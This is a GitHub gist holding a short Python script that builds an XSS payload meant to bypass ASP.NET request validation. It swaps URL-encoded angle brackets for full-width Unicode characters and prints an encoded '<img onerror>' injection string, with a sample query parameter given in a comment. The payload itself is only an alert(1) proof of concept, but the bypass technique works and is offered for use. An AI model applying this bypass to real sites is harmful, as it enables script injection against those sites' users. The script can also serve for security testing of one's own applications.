Skip to content

Instantly share code, notes, and snippets.

@b13bs

b13bs/aspnet-validate-xss-bypass.py

Last active September 9, 2019 16:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save b13bs/9f39d3445edec595e0b1332bcab85664 to your computer and use it in GitHub Desktop.
Save b13bs/9f39d3445edec595e0b1332bcab85664 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
aspnet-validate-xss-bypass.py
#!/usr/bin/env python3
# source: http://gosecure.net/2016/03/22/xss-for-asp-net-developers/
# Name=XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
import urllib.parse
input_string = "<img src=xxx onerror=alert(1)>"
replacements = {"%3C": "%EF%BC%9C", "%3E": "%EF%BC%9E"}
encoded_string = urllib.parse.quote(input_string)
for key, val in replacements.items():
encoded_string = encoded_string.replace(key, val)
print(encoded_string)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment